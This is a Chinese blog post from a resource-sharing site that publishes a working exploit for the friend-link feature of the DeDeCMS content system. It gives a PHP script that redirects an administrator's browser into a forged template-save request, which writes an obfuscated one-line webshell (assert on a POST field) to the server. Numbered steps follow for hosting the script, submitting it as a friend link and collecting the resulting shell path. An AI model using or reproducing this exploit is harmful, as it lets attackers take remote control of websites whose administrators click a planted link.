DeDeCMS友链被黑，心如刀割。

摘要

这个漏洞太可怕了！详情请见：http://0day5.com/archives/4209/EXP:。我们必须尽快采取措施，保护我们的网络安全！

正文

【摘要】漏洞详情：http://0day5.com/archives/4209/EXP:<?php//print_r($_SERVER);$referer=$_SERVER[‘HTTP_REFERE…

漏洞详情：

http://0day5.com/archives/4209/

EXP:

<?php//print_r($_SERVER);$referer = $_SERVER[‘HTTP_REFERER’];$dede_login = str_replace(“friendlink_main.php”,””,$referer);$muma = ‘<‘.’?’.’a’.’s’.’s’.’e’.’r’.’t’.'(‘.’$’.’_’.’P’.’O’.’S’.’T’.'[‘.’\”.’a’.’\”.’]’.’)’.’;’.’?’.’>’;$exp = ‘tpl.php?action=savetagfile&actiondo=addnewtag&content=’. $muma .’&filename=shell.lib.php’;$url = $dede_login.$exp;//echo $url;header(“location: “.$url);// send mail coderexit();?>

使用方法：

1.保存上方exp，上传至服务器；

2.访问目标网站:http://www.test.com/plus/flink.php

链接填写部署的exp的URL；

3.等待管理员触发，得到shell地址http://www.test.com/include/taglib/dy.lib.php

关注不迷路

扫码下方二维码，关注宇凡盒子公众号，免费获取最新技术内幕！

温馨提示：如果您访问和下载本站资源，表示您已同意只将下载文件用于研究、学习而非其他用途。

文章版权声明 1、本网站名称：宇凡盒子
2、本站文章未经许可，禁止转载！
3、如果文章内容介绍中无特别注明，本网站压缩包解压需要密码统一是：yufanbox.com
4、本站仅供资源信息交流学习，不保证资源的可用及完整性，不提供安装使用及技术服务。点此了解
5、如果您发现本站分享的资源侵犯了您的权益，请及时通知我们，我们会在接到通知后及时处理！提交入口

DeDeCMS友链被黑，心如刀割。

摘要

正文

漏洞详情：

EXP:

使用方法：

关注不迷路

评论0

在线客服

升级VIP

夜间模式

返回顶部

站点公告

DeDeCMS友链被黑，心如刀割。

摘要

正文

漏洞详情：

EXP:

使用方法：

关注不迷路

大家在看

评论0

在线客服

升级VIP

夜间模式

返回顶部

站点公告

社交账号快速登录

社交账号快速登录